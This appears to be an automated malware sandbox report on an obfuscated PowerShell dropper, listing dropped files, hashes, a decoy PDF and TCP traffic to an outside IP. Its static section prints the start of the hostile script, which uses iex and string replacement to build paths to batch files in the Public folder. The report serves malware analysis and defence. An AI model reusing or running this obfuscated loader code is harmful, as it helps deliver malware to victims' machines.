                                                    SSDEEP:96:6JiNp29ECmTTT8dePc4lDe/quy47rHMMMT8:CyCaT8UgB3
                                                    MD5:E0E44159B1CE64E3FBCA349002312A5A
                                                    SHA1:3E2C1142527A78285FCBE981250E07A6FB5C94E5
                                                    SHA-256:850CACAE25D1D93F40679BF94F801027CDB3DFDACA2CDFFBA2836EE0B19DCE44
                                                    SHA-512:EFC5A54E1A000DD4D38AC95EFA76412A2B4EF7E94A7B4C6AC20A8656551756D3D05A0323BB29CAC47008D71024300468B9B2A735CA16A23EC6DF1CEEC856E487
                                                    Malicious:false
                                                    Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3024000, file counter 12, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 12
                                                    Category:dropped
                                                    Size (bytes):61440
                                                    Entropy (8bit):3.5688755021136545
                                                    Encrypted:false
                                                    SSDEEP:384:3el9dThRtELJ8f0RxOY71ZsLRGlKh4vXh+vSc:Q4T1ZsLUhUSc
                                                    MD5:7B4E15728918BC83644AAF2690450293
                                                    SHA1:982059EB6C295448AC5AE727786797BFA8C85C19
                                                    SHA-256:0A942D393740CB2A8D1CB9B9804CDA8E87EF3A36A13CF6A762C24184320B904A
                                                    SHA-512:C21CF4F9357E57F1BD3C208A6058032982CA26D9F99C89E5842134829EABB9C7EB78ABD1F8BAA12BDEB8E7A40A586020AED275C014536ADC5C17B42C0274FDEF
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):3.2892329878129445
                                                    Encrypted:false
                                                    SSDEEP:48:7MWom1CZiomliom2om1Nom1Aiom1RROiom1oom1pom1HZiomVsiomg9qQlmFTIF1:76Z2OhjCs9N49IVXEBodRBku
                                                    MD5:2633FC03624F53923D7F7D83C49388E3
                                                    SHA1:AF1494FCA37573D818596C2190711DF1CFD43914
                                                    SHA-256:9F5BC6C16FC66F4E00FED196E9417E389AEE948ED04AEB707EF4719C66B6548A
                                                    SHA-512:4B3AE76DD0A47BDCB790BDA90B660ED850AB28CDABCC8EA3504FEA4DD9A33F6EB89B5FF699A287375CB7BFEB946A2A7C5768CC7936978E31C0CB5F476FB88454
                                                    Malicious:false
                                                    Preview:.... .c.......5&..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s........L.s.y................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):63598
                                                    Entropy (8bit):5.433041226997456
                                                    Encrypted:false
                                                    SSDEEP:768:PCbGNFYGpiyVFiCUZfekEkUQPA7jQ9SF1WNbmAZIWkU1ZYyu:J0GpiyVFiBVEkUQPAfpFQZvkAK
                                                    MD5:05C495F13535B406207C93DC78D82008
                                                    SHA1:ED73EFD4E6927639329AA23C7B0369B5DC17EAE8
                                                    SHA-256:3E1567117905EF993B6D392BD58BB1291923D204D4C6025360104BECDBF875ED
                                                    SHA-512:F7060DF58B54497884D11603B7DCCACB363E6B3B8A51D5D15D90EC13C94870F90951A0573A13EFE17CE96B028452017D388B1AFC36EEFF30514BB19D6A87B572
                                                    Malicious:false
                                                    Preview:4.382.88.FID.2:o:........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.94.FID.2:o:........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.82.FID.2:o:........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.93.FID.2:o:........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.107.FID.2:o:........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.103.FID.2:o:........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.116.FID.2:o:........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.75.FID.2:o:........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.89.FID.2:o:........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.85.FID.2:o:........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.98.FID.2:o:........:F:Arial-B

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Quarrelers.Cod

                                                    Download File
                                                    Process:C:\Users\Public\wusb.bat
                                                    File Type:ASCII text, with very long lines (63174), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):63174
                                                    Entropy (8bit):2.6774097576064904
                                                    Encrypted:false
                                                    SSDEEP:768:3YEEGqhLpa+/YcynMY2/LX+OLugY5QzfsqHeWEEtKxla+2HfoiHdGhM0RSliNkWj:P+gnaLU6nHfOhJSAk9MN8ABC0riG
                                                    MD5:4A179C732FBA82188F2D1C207BFE228E
                                                    SHA1:D8A88AB76074671ED11A9636DBE6012A2B61C6C1
                                                    SHA-256:2ADE6C66A5BF036D8E9899ADE349C7A887BE41757A7004869E19A64AB2BD0B7E
                                                    SHA-512:D6200251DC566516FFD8601153022B0E8AAAFCED83CA2A95CB3F93E12E84DDFEC2FBC48CACFE49EBF34A25D5418FDEF154D31AB008BBA878B7B21E7D98FD81EF
                                                    Malicious:false
                                                    Preview:003000E9004E00000041000000484800D10000606000230000575700C10000006A6A00A0A0A0001717170000005C5C00A7000000F50000004C4C000028282800A70000A70070707070707000AF00DF00AFAF00EBEB00AF0000000000F00057001F008D8D002C2C2C0000000000606060606060600000800000E7000000320000003737007A7A0000606060606000007474740000000000262600BDBD008F0000F8F80051510033330000CC0000000000E3E300B00000BA0000000303009595959500B40054545454005700F600006C0000EA004A4A000D00001B1B1B1B000039000000000000737373730000AC004100000000002B0000202020202000858500CC000017005900003D0045450000006D00FE00000005050505000055555500000098000000AC00007E006200000900003D3D004F4F000000000000D6007D7D003D00000000000043430000007F007E00F600000000000000000000000041008E8E8E8E8E8E8E006F6F0035004B000000CA002C00130000000000000000AE00006000000000EB000000E700004D4D4D00AD0000330045454545450000000500A9A9008D8D0000D4000000ED00000000003D3D000000C1C1000000000B000000CACACACACACACA0047003232004E4E00000000F300000000003D00008E8E007F000E004545454500007B009C9C9C00000003030000

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\Postpyloric6.Ann

                                                    Download File
                                                    Process:C:\Users\Public\wusb.bat
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):118233
                                                    Entropy (8bit):7.710808982633477
                                                    Encrypted:false
                                                    SSDEEP:3072:XO5UDdjGuQqD+lhBEfDhNTWYZwhVZqBEKwib7YuX3:LDddisbaY6hVZqBLdRX3
                                                    MD5:A7B2863D380B7FE3F8E99B4BF634B39F
                                                    SHA1:85595D001B815501BB91996BCAE34600ABA3C36E
                                                    SHA-256:65FE205CBE270540C6E67A3307C61EE18475062F36F8A5836B3958BD7E24F533
                                                    SHA-512:3403955017869C8A4602441B20EDC52EC9AFC26CA6FE3891309BEF8B2A4CDD7C4D50CC2DCE667467CC72044C01F729476772FE1B83EF2F4A5CFB3940A4BF7D9B
                                                    Malicious:false
                                                    Preview:...............................U..].........CCC.....2.4.....<.................4.......ddddddd.......w................DDDD....ttt..........................mm......v.x..............%.......}}.u.....................8................}.K.5...................g...u.......c............b.......ff....&&.........l.....................?...............h.......!..|......5......................................................T...4...yy.........................oo.....j..r.......V..D.....V..........................(......C..333............99..P..........******..JJ..iii.........m.$..........l..$..................................................8....ppppppp........~~~~..........QQQQ..n..M.....................[....GG.............gggggggggg..........===.6.........................C.................999......+.......222......0.y..............b.....!!..................U........[.zz..................7..................Z..........YY.......A.....|.....M........,,..LLL.1...KK.....H......PP......O..e....J.o.L.....|

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll

                                                    Download File
                                                    Process:C:\Users\Public\wusb.bat
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):88064
                                                    Entropy (8bit):5.775805248630538
                                                    Encrypted:false
                                                    SSDEEP:1536:QFNovLGNuZPQtwhY4SFDivO5Ib6VU3x8sDKxq:QFNsLGNulhY4SG+xq
                                                    MD5:0EDD7743DB76D68D2E198F137E56360C
                                                    SHA1:76B0ACA1C410901C8399FBFDAC2AC36E80C4837C
                                                    SHA-256:F03C45B29D8DB5C2BD9461EFB834723C2F9C84A1FED921D9577BC0511AE0B86D
                                                    SHA-512:67716007A5771D3A45104CB0C3823EBAE58F39E91B5A8AA4653A6FD3E65162C824DF7E5944A123DA70F7739904EF46E43B7A7E1906BE95FB11CAE906673FBB58
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: zpeu.exe, Detection: malicious, Browse
                                                    • Filename: zpeu.exe, Detection: malicious, Browse
                                                    • Filename: as.ps1, Detection: malicious, Browse
                                                    • Filename: KwP6qU3cQ8.exe, Detection: malicious, Browse
                                                    • Filename: KwP6qU3cQ8.exe, Detection: malicious, Browse
                                                    • Filename: DB948GHBNJI.xlsx, Detection: malicious, Browse
                                                    • Filename: Order-new world foods.xlsx, Detection: malicious, Browse
                                                    • Filename: 8cAZneRN6B.exe, Detection: malicious, Browse
                                                    • Filename: 8cAZneRN6B.exe, Detection: malicious, Browse
                                                    • Filename: fr34veeTGm.exe, Detection: malicious, Browse
                                                    • Filename: fr34veeTGm.exe, Detection: malicious, Browse
                                                    • Filename: ShipmentReceipt9521368040.xlsx, Detection: malicious, Browse
                                                    • Filename: njUIPPVrud.exe, Detection: malicious, Browse
                                                    • Filename: njUIPPVrud.exe, Detection: malicious, Browse
                                                    • Filename: ShipmentReceipt93213628045.xlsx, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.O...........!.....N..........~m... ........@.. ...............................%....@.................................$m..W....................................l............................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B................`m......H........F...&...................E.......................................(....*..0................(....(......(....&.(...+*."..(....*...Z.~....(....-..s....*.*..0..6........{.........(.....{....M........ZXM)....(.......(.....*...0..D........{........,..o....+.~....(.....{....M........ZXM)....(.......(.....*.0..5..........{..........(.....{....M........ZXM)....(.........*....0..6..........{..........{....M........ZXM)....(..........(.....*...0..:.......s.......o......(......~.

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\bn.txt

                                                    Download File
                                                    Process:C:\Users\Public\wusb.bat
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):15062
                                                    Entropy (8bit):4.039346182307332
                                                    Encrypted:false
                                                    SSDEEP:192:iM+g4O23sZEstg+lTr++0Mx148IiZaXTXEU10bXYc+4/rexX4:iMyc2stg+lTr++0MQ8DZRDYc+4axI
                                                    MD5:D0E788F64268D15B4391F052B1F4B18A
                                                    SHA1:2FD8E0A9DD22A729D578536D560354C944C7C93E
                                                    SHA-256:216CC780E371DC318C8B15B84DE8A5EC0E28F712B3109A991C8A09CDDAA2A81A
                                                    SHA-512:D50EA673018472C17DB44B315F4C343A2924A2EAA95C668D1160AA3830533CA37CC13C2067911A0756F1BE8C41DF45669ABE083759DCB9436F98E90CBB6AC8BF
                                                    Malicious:false
                                                    Preview:.;!@Lang2@!UTF-8!..; 4.46 : Team Oruddho (Fahad Mohammad Shaon, Mahmud Hassan) : http://www.oruddho.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Bangla.........401..... ..................&.......&....&.... ................&...... .......440..&....... .... ........&...... .... .............. ......&........& .......&.............. ............... ..... .... ......?..500..&......&..................&..&.......&........&........540..&........ .....7-zip-. ........ ........... ........ .....&..........&............. ...

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\find-location-symbolic.svg

                                                    Download File
                                                    Process:C:\Users\Public\wusb.bat
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):713
                                                    Entropy (8bit):4.445408002557924
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdPnnl/nu3tlndL9+Wlz3MQFcWUio23kRqaM8UwYOWlz2Wlzm7Wlzi5WlzsbWW:2dPnnxu3tldLklFWUi/3kRqaRUZODv7R
                                                    MD5:9A5B1DB3C4E78A928BDB639BE46AA003
                                                    SHA1:595D3D9C7BB646CF607923AEBC3583B48F03B426
                                                    SHA-256:0C481D646B531DCBF2FCCE2A034CE6A202CAEEB1C17A591756CB3A08514AC9ED
                                                    SHA-512:CA5E59B27D89651DFE89868C2D0DF63EFE64AB4B3E0E49937CFC15E84610505E2378E29D716FB803BEF74C80D99D25E93B7D5E8D7B1BE3EF905A8C910011F47F
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 11 8 c 0 1.65625 -1.34375 3 -3 3 s -3 -1.34375 -3 -3 s 1.34375 -3 3 -3 s 3 1.34375 3 3 z m 0 0"/>. <path d="m 8 1 c -3.851562 0 -7 3.144531 -7 7 s 3.148438 7 7 7 s 7 -3.144531 7 -7 s -3.148438 -7 -7 -7 z m 0 2 c 2.773438 0 5 2.230469 5 5 s -2.226562 4.996094 -5 4.996094 s -5 -2.226563 -5 -4.996094 s 2.226562 -5 5 -5 z m 0 0"/>. <path d="m 7 0 h 2 v 3 h -2 z m 0 0"/>. <path d="m 7 13 h 2 v 3 h -2 z m 0 0"/>. <path d="m 16 7 v 2 h -3 v -2 z m 0 0"/>. <path d="m 3 7 v 2 h -3 v -2 z m 0 0"/>. </g>.</svg>.

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\network-cellular-symbolic.svg

                                                    Download File
                                                    Process:C:\Users\Public\wusb.bat
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):441
                                                    Entropy (8bit):4.575285851859924
                                                    Encrypted:false
                                                    SSDEEP:12:t4CDqwqZo8nGGa6Smf+e9s/J7e3VN5IUavl+i:t4CGosm6Sle9s/Be3Vv+lN
                                                    MD5:79F668FBC971471D3CE930DD5B53F01D
                                                    SHA1:0A21641F8BDCA5C3DDAAA2224E80784BF1F3EE9A
                                                    SHA-256:8ECA65E299CCB64B2145263827EED45130336E01A4FB1F309C8A36E8751473D4
                                                    SHA-512:DFA0CD2923F83514181299F7374D553B2B427028E47BC2033E377850FD98121806EA370DEE64349AE410F84CC815E74AFF8E11227FCF21E2E1BF83BAA6BD2616
                                                    Malicious:false
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1c-1.261.98-2 2.833-2 5 0 2.127.777 4.005 2 5h1V9c-.607-.78-1-1.759-1-3s.393-2.211 1-3V1zm11 0v2c.607.789 1 1.759 1 3s-.393 2.22-1 3v2h1c1.223-.995 2-2.873 2-5 0-2.167-.739-4.02-2-5zM4 3c-.688.784-1 1.743-1 3s.328 2.163 1 3h1V3zm7 0v6h1c.672-.837 1-1.743 1-3s-.312-2.216-1-3zM8 4a2 2 0 100 4 2 2 0 000-4zm0 5a1 1 0 00-1 1v6h2v-6a1 1 0 00-1-1z" fill="#2e3436"/></svg>

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1196
                                                    Entropy (8bit):5.333915035046385
                                                    Encrypted:false
                                                    SSDEEP:24:3aZPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJF9G:qZPerB4nqRL/HvFe9t4Cv94anG
                                                    MD5:B15D7C50C640BEF4A1E823CE568A5E5E
                                                    SHA1:E456E2EE754F8FBA38F8F75858491258896C9E41
                                                    SHA-256:A95974F134C10C31BF7B1243C3E5F3987F1CC878565E28182DEC577D552450C0
                                                    SHA-512:B7E7D0303E3DCF81217B7AC871AF1C4871D8BA19CC595DB35A6640108411126666D244D8CF91D766E129E7306FBCBA9622746DF74EC030E180CFDEDB78239107
                                                    Malicious:false
                                                    Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cew2lk0s.t5u.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohunyas2.sup.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\nsr743A.tmp\System.dll

                                                    Download File
                                                    Process:C:\Users\Public\wusb.bat
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):11776
                                                    Entropy (8bit):5.659384359264642
                                                    Encrypted:false
                                                    SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                    MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                    SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                    SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                    SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0ENGBPCVN84BCWHMGRSY.temp

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6206
                                                    Entropy (8bit):3.7592396421429313
                                                    Encrypted:false
                                                    SSDEEP:48:94+FRWRAleRs9kWRH3R/sCERmUHIJ8DgxgukvhkvklCywdY26poJ18keSogZoF45:9hTP9kMNsCSfskvhkvCCt2OxHlOxH4
                                                    MD5:422FCA58B3BE6234E09EB8C12520A7AB
                                                    SHA1:801DE73F2A6C83BC75639D418366B89F9D160251
                                                    SHA-256:D0D848BE38B41B4AF9DD9A81FDC8F13A89A5D3B81EB72B9F42198B42CA45140E
                                                    SHA-512:5091240AD28614CB655D1DBD80C7546C26DBB99AC4E1DC70ACE54A48830371C938F9DCEB230959CD8C972B40DA7E2101BA6E7F1801E5C6A22FF17BD9560B668E
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. .......-..7.4..a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..Q.3......C........t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..V......Y.....................R..A.p.p.D.a.t.a...B.V.1......NN...Roaming.@.......NM..V......Y....................f...R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......NM..V......Y.....................f0.M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......NM..V......Y.....................s..W.i.n.d.o.w.s.......1......NN...STARTM~1..n.......NM..V......Y..............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.t..Programs..j.......NM..V......Y..............@......3..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......NM..U......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......NM..P......Y..........

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6206
                                                    Entropy (8bit):3.7592396421429313
                                                    Encrypted:false
                                                    SSDEEP:48:94+FRWRAleRs9kWRH3R/sCERmUHIJ8DgxgukvhkvklCywdY26poJ18keSogZoF45:9hTP9kMNsCSfskvhkvCCt2OxHlOxH4
                                                    MD5:422FCA58B3BE6234E09EB8C12520A7AB
                                                    SHA1:801DE73F2A6C83BC75639D418366B89F9D160251
                                                    SHA-256:D0D848BE38B41B4AF9DD9A81FDC8F13A89A5D3B81EB72B9F42198B42CA45140E
                                                    SHA-512:5091240AD28614CB655D1DBD80C7546C26DBB99AC4E1DC70ACE54A48830371C938F9DCEB230959CD8C972B40DA7E2101BA6E7F1801E5C6A22FF17BD9560B668E
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. .......-..7.4..a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..Q.3......C........t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..V......Y.....................R..A.p.p.D.a.t.a...B.V.1......NN...Roaming.@.......NM..V......Y....................f...R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......NM..V......Y.....................f0.M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......NM..V......Y.....................s..W.i.n.d.o.w.s.......1......NN...STARTM~1..n.......NM..V......Y..............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.t..Programs..j.......NM..V......Y..............@......3..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......NM..U......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......NM..P......Y..........

                                                    C:\Users\user\Desktop\List of required items and services.pdf

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PDF document, version 1.7 (zip deflate encoded)
                                                    Category:dropped
                                                    Size (bytes):653248
                                                    Entropy (8bit):7.983402816932296
                                                    Encrypted:false
                                                    SSDEEP:12288:Z5j8QLfikr2uyiCDVvzDFgONPYpKE7nmP4II3xHjK4HTbuSGxEw6:H8QbZ2upCDtuOQKE7nmA3xWYT6LT6
                                                    MD5:9B05142184F080AE36983D0A25597143
                                                    SHA1:6421CD63995163132E89709FF70D695825A3CBDC
                                                    SHA-256:F16B7347BCAADA09E4A85E92A704CCC67F413DDBA62BBDF4BBE14A7B687AC455
                                                    SHA-512:EBDB6D9682A0DAC526214D9E5173E0CF627D1E538F2A728768E913FD2CE94B926DA6A248DFB5AE6D1DFAF0CE33807D3007D05785BE200687C55B926DCE6908DC
                                                    Malicious:false
                                                    Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

                                                    Static File Info

                                                    General

                                                    File type:ASCII text, with very long lines (824), with no line terminators
                                                    Entropy (8bit):5.376856703442185
                                                    TrID:
                                                      File name:zk.ps1
                                                      File size:824
                                                      MD5:e6bf6857327f35fa2de93d4a51f97a94
                                                      SHA1:cf9e0527dd421c74f841d57b73611e0b2cd1d147
                                                      SHA256:5921fbf975020277efb4018858252ba81765a3bbeedf1b67061691faf6f4f6da
                                                      SHA512:c35c9dcb2e3a12777d88135b133ed222c33973187d214bf3fb78217fff7f8cdd63bc053b235888100798d35f25e93c6a2430207f98b5327dc0ba1d3eb0085cea
                                                      SSDEEP:24:ZZ64ZYWIXluH2GVKNuLyZQffvoPWAa6W9zm52I+O3+:ZY4zIwWGVKNuvodqzecOO
                                                      TLSH:290146CD179657E34540B68130D0873F2331C11C74E648E1E6A18307207C5BC1EC697E
                                                      File Content Preview:$flol3=iex($('[Environment]::GetEvjrt'''.Replace('vjr','nvironmentVariable(''public'') + ''\\bi1xb0.ba')));$flol=iex($('[Environment]::GetEvjrt'''.Replace('vjr','nvironmentVariable(''public'') + ''\\wusb.ba')));function getit([string]$fz, [string]$oulv){$

                                                      File Icon

                                                      Icon Hash:3270d6baae77db44

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jun 1, 2023 12:14:23.520071983 CEST49717443192.168.2.584.16.234.51
                                                      Jun 1, 2023 12:14:23.520148993 CEST4434971784.16.234.51192.168.2.5
                                                      Jun 1, 2023 12:14:23.520257950 CEST49717443192.168.2.584.16.234.51
                                                      Jun 1, 2023 12:14:23.556720972 CEST49717443192.168.2.584.16.234.51
                                                      Jun 1, 2023 12:14:23.556759119 CEST4434971784.16.234.51192.168.2.5
                                                      Jun 1, 2023 12:14:23.641750097 CEST4434971784.16.234.51192.168.2.5
                                                      Jun 1, 2023 12:14:23.641855955 CEST49717443192.168.2.584.16.234.51
                                                      Jun 1, 2023 12:14:23.646668911 CEST49717443192.168.2.584.16.234.51
                                                      Jun 1, 2023 12:14:23.646703959 CEST4434971784.16.234.51192.168.2.5
                                                      Jun 1, 2023 12:14:23.647347927 CEST4434971784.16.234.51192.168.2.5
